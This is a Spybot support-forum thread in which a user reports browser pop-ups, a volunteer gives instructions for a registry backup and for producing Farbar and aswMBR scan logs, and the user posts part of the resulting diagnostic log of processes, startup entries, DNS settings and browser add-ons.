
Thread: Malware or Spybot Issue

  1. #1
    Junior Member
    Join Date
    Feb 2016
    Posts
    11

    Malware or Spybot Issue

    Hi,
    I have an Intel Core i5-4670K at 3.40GHz
    16GB of RAM
    Running Windows 10 Home edition (64 bit)
    Using Avast Antivirus
    Chrome Browser

    I am working from the infected computer. I am able to access some pages just fine, like Hotmail, the Spybot website and YouTube, but some of my other frequently visited sites all have numerous pop-ups now.

    I have run a few full system scans using Spybot - Search and Destroy 2.5 and it has found 5 items with very low to marginal danger ratings. I have selected 'Fix Selected' and the green tick appears, but the pop-ups still seem to persist, and after running more full system scans the same 5 problems come up again. I don't know if this information is redundant or too vague, but the problem types are: Registry Change (2 of those), Browser: Cache, Registry Key, and Browser History. The categories are Tracks (3 of those) and Browser (2 of those).

    I can attach screenshots and whatever else is needed if it helps in diagnosing and solving the problem.

    Thanks for any and all help.
    --------------------------------
    Admin Edit

    FAQ: http://forums.spybot.info/showthread.php?t=288

  2. #2
    Security Expert Juliet's Avatar
    Join Date
    Feb 2007
    Location
    Deep South
    Posts
    3,818


    Please back up your registry!

    Backup the Registry:
    Credit: Dakeyras

    Modifying the Registry can create unforeseen problems, so it is always wise to create a backup before doing so.

    • Please download the installer for Registry Backup from here or here and save to your desktop.
    • Right-click on tweaking.com_registry_backup_setup.exe and select Run as Administrator >> Follow the prompts for a default installation
    • Ensure the option Open "Tweaking.com - Registry Backup" When Install Completes is selected >> Next > >> Finish
    • Once the GUI (graphical user interface) has appeared/loaded:-



    • Click on Backup Now >> once the process is complete the below will be displayed in the GUI:-



    • Close Tweaking.com - Registry Backup

    Note: There will now be a folder at the root of the Hard-Drive named C:\RegBackup, do not delete this as it is the actual backup just created.

    A tutorial for Registry Backup explaining the various features can be viewed HERE


    --------------------------------
    Instructions for producing the Farbar Recovery Scan Tool (FRST) and aswMBR logs

    Farbar Log

    Please download Farbar Recovery Scan Tool and save it to your desktop.

    Note:
    You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

    (A simple way to check your system: Start --> Computer (right click) --> Properties)
    How to determine whether a computer is running a 32-bit version or 64-bit version of the Windows operating system

    • Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
    • Please make sure All Users is checked


    • Do not check
      *List BCD
      *Drivers MD5
      *Shortcut txt

    Or your logs will be too long to post.


    • Press Scan button.
    • It will produce a log called FRST.txt in the same directory the tool is run from.
    • Please don't run the Farbar Recovery Scan Tool (FRST.txt) from your "Downloads" folder or from "Temporary Internet Files"
    • Please copy and paste log into your topic.
    • The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please attach that along with the FRST.txt into your reply.



    aswMBR Log

    Important! Please do NOT perform any fix options offered in aswMBR, we just need to see the report.

    Please download aswMBR to your desktop.


    • Double click the aswMBR icon to run it.
    • If a prompt stating: The computer supports "Virtualization Technology" appears select Yes
    • Click the Scan button to start scan.
    • If you are asked to update the Avast Virus database please allow it to do so.
    • When it finishes, press the Save Log button, save the logfile to your desktop and post its contents in your reply with the Farbar (FRST) log.
    Windows Insider MVP Consumer Security 2009 - 2017
    Please do not PM me for Malware help, we all benefit from posting on the open board.

  3. #3
    Junior Member
    Join Date
    Feb 2016
    Posts
    11

    Farbar Recovery Scan Tool and aswMBR logs

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:27-02-2016
    Ran by Kym (administrator) on KYM-PC (29-02-2016 20:46:10)
    Running from C:\Users\Kym\Desktop
    Loaded Profiles: Kym (Available Profiles: Kym)
    Platform: Windows 10 Home (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser: Chrome)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic...ery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (AMD) C:\WINDOWS\System32\atiesrxx.exe
    (Intel Corporation) C:\WINDOWS\System32\igfxCUIService.exe
    (Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
    (Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    (Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
    (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
    (Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
    (Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
    (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
    (Microsoft Corporation) C:\WINDOWS\System32\mqsvc.exe
    (Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe
    (Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
    () C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
    (Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
    (Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
    (Avast Software) C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe
    (AVAST Software) C:\Program Files\AVAST Software\Avast\ng\ngservice.exe
    (Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
    (Intel Corporation) C:\WINDOWS\System32\igfxEM.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDMedia.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDCountdown.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDClock.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDPOP3.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDRSS.exe
    (Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
    (Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\cnext.exe
    (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
    (Angus Johnson) D:\Internode\mum.exe
    (Spotify Ltd) C:\Users\Kym\AppData\Roaming\Spotify\SpotifyWebHelper.exe
    (Acresso Corporation) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
    (Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastUI.exe
    (Razer Inc.) C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe
    (Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe
    (Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfPro5Hook.exe
    (Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
    (Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
    (Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\BrYNSvc.exe
    (Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
    (Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
    () C:\ProgramData\Razer\Synapse\RzStats\RzStats.Manager.exe
    (Razer, Inc.) C:\Program Files (x86)\Razer\InGameEngine\32bit\RazerIngameEngine.exe
    (Razer, Inc.) C:\Users\Kym\AppData\Local\Razer\InGameEngine\cache\RzStats.Manager\rzcefrenderprocess.exe
    (Razer, Inc.) C:\Users\Kym\AppData\Local\Razer\InGameEngine\cache\RzSynapse\rzcefrenderprocess.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
    (Adobe Systems Incorporated) D:\Program Files\Adobe\Adobe Premiere Elements 2011\Elements 11 Organizer\PhotoshopElementsFileAgent.exe
    (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
    (Microsoft Corporation) C:\WINDOWS\System32\dllhost.exe
    (Microsoft Corporation) C:\WINDOWS\System32\dllhost.exe


    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13885696 2015-06-24] (Realtek Semiconductor)
    HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-07] (Intel Corporation)
    HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [396688 2015-07-18] ()
    HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508240 2015-08-05] (Adobe Systems Incorporated)
    HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [14601160 2015-07-02] (Logitech Inc.)
    HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-09-15] (Apple Inc.)
    HKLM\...\Run: [StartCN] => C:\Program Files\AMD\CNext\CNext\cnext.exe [4867784 2015-12-04] (Advanced Micro Devices, Inc.)
    HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-04-26] (Intel Corporation)
    HKLM-x32\...\Run: [Logitech G35] => D:\G35.exe
    HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5515496 2015-07-02] (Avast Software s.r.o.)
    HKLM-x32\...\Run: [] => [X]
    HKLM-x32\...\Run: [Razer Synapse] => C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [591512 2015-11-19] (Razer Inc.)
    HKLM-x32\...\Run: [QuickTime Task] => D:\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
    HKLM-x32\...\Run: [IndexSearch] => C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe [46952 2011-08-02] (Nuance Communications, Inc.)
    HKLM-x32\...\Run: [PaperPort PTD] => C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe [30568 2011-08-02] (Nuance Communications, Inc.)
    HKLM-x32\...\Run: [PDFHook] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe [636192 2010-03-05] (Nuance Communications, Inc.)
    HKLM-x32\...\Run: [PDF5 Registry Controller] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe [62752 2010-03-05] (Nuance Communications, Inc.)
    HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [139776 2014-06-16] (Brother Industries, Ltd.)
    HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [3076096 2012-06-06] (Brother Industries, Ltd.)
    HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => "D:\LogMeIn\hamachi-2-ui.exe" --auto-start
    HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595504 2016-01-29] (Oracle Corporation)
    HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4127488 2015-06-16] (Safer-Networking Ltd.)
    Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [Steam] => D:\Steam\steam.exe [3014224 2016-02-05] (Valve Corporation)
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [InternodeUsage] => D:\Internode\mum.exe [2242560 2014-12-04] (Angus Johnson)
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [Spotify Web Helper] => C:\Users\Kym\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2355312 2016-02-19] (Spotify Ltd)
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Corporation)
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [f.lux] => C:\Users\Kym\AppData\Local\FluxSoftware\Flux\flux.exe [1017224 2013-10-24] (Flux Software LLC)
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
    ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
    ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
    ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
    ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2015-07-02] (Avast Software s.r.o.)
    ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    Startup: C:\Users\Kym\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Open Broadcaster Software (32bit) (2).lnk [2015-08-20]
    ShortcutTarget: Open Broadcaster Software (32bit) (2).lnk -> C:\Program Files (x86)\OBS\OBS.exe ()
    BootExecute: autocheck autochk * sdnclean64.exe

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
    Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
    Tcpip\Parameters: [NameServer] 82.163.143.171 82.163.142.173
    Tcpip\..\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa}: [NameServer] 82.163.143.171 82.163.142.173
    Tcpip\..\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa}: [DhcpNameServer] 192.168.1.1

    Internet Explorer:
    ==================
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
    SearchScopes: HKLM -> DefaultScope value is missing
    SearchScopes: HKLM-x32 -> DefaultScope value is missing
    BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> D:\Microsoft Office 2013\Office15\OCHelper.dll [2016-01-12] (Microsoft Corporation)
    BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2015-07-02] (Avast Software s.r.o.)
    BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
    BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
    BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2016-01-12] (Microsoft Corporation)
    BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} -> C:\Program Files (x86)\Nuance\PDF Viewer Plus\Bin\PlusIEContextMenu.dll [2009-02-06] (Zeon Corporation)
    BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\ssv.dll [2016-02-25] (Oracle Corporation)
    BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2015-07-02] (Avast Software s.r.o.)
    BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
    BHO-x32: No Name -> {c4e7ab80-82fd-49d4-801d-669cc0a2392a} -> No File
    BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
    BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\jp2ssv.dll [2016-02-25] (Oracle Corporation)
    Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - D:\Microsoft Office 2013\Office15\MSOSB.DLL [2015-02-17] (Microsoft Corporation)
    Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)
    Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
    Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)

    FireFox:
    ========
    FF Plugin: @microsoft.com/SharePoint,version=14.0 -> D:\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
    FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2014-04-28] (Adobe Systems)
    FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [No File]
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [No File]
    FF Plugin-x32: @java.com/DTPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\dtplugin\npDeployJava1.dll [2016-02-25] (Oracle Corporation)
    FF Plugin-x32: @java.com/JavaPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\plugin2\npjp2.dll [2016-02-25] (Oracle Corporation)
    FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-11-18] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
    FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
    FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> D:\VLC\npvlc.dll [2015-04-13] (VideoLAN)
    FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> D:\VLC\npvlc.dll [2015-04-13] (VideoLAN)
    FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-19] (Adobe Systems Inc.)
    FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2014-04-28] (Adobe Systems)
    FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2015-11-18] (Microsoft Corporation)
    FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
    FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2015-12-10]

    Chrome:
    =======
    CHR HomePage: Default -> hxxp://www.google.com/
    CHR StartupUrls: Default -> "hxxp://www.youtube.com/feed/subscriptions","hxxp://imgur.com/","hxxps://www.netflix.com/","hxxp://twitch.tv/"
    CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\PepperFlash\pepflashplayer.dll ()
    CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\ppGoogleNaClPluginChrome.dll => No File
    CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\pdf.dll => No File
    CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll => No File
    CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll => No File
    CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll => No File
    CHR Plugin: (Java(TM) Platform SE 7 U55) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
    CHR Profile: C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default
    CHR Extension: (YouTube) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
    CHR Extension: (Adblock Plus) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-02-26]
    CHR Extension: (Google Search) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-26]
    CHR Extension: (Gmail) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-28]
    CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2015-07-02]
    CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]

    ==================== Services (Whitelisted) ========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 AdobeActiveFileMonitor11.0; D:\Program Files\Adobe\Adobe Premiere Elements 2011\Elements 11 Organizer\PhotoshopElementsFileAgent.exe [171600 2012-09-17] (Adobe Systems Incorporated)
    R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2020056 2016-02-09] (Adobe Systems, Incorporated)
    R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-09-02] (Apple Inc.)
    S3 AppleChargerSrv; C:\Windows\System32\AppleChargerSrv.exe [31272 2010-04-07] ()
    R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [343336 2015-07-02] (Avast Software s.r.o.)
    R3 AvastVBoxSvc; C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe [4034896 2015-07-02] (Avast Software)
    S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [49152 2014-05-04] () [File not signed]
    R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [266240 2012-06-05] (Brother Industries, Ltd.) [File not signed]
    R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
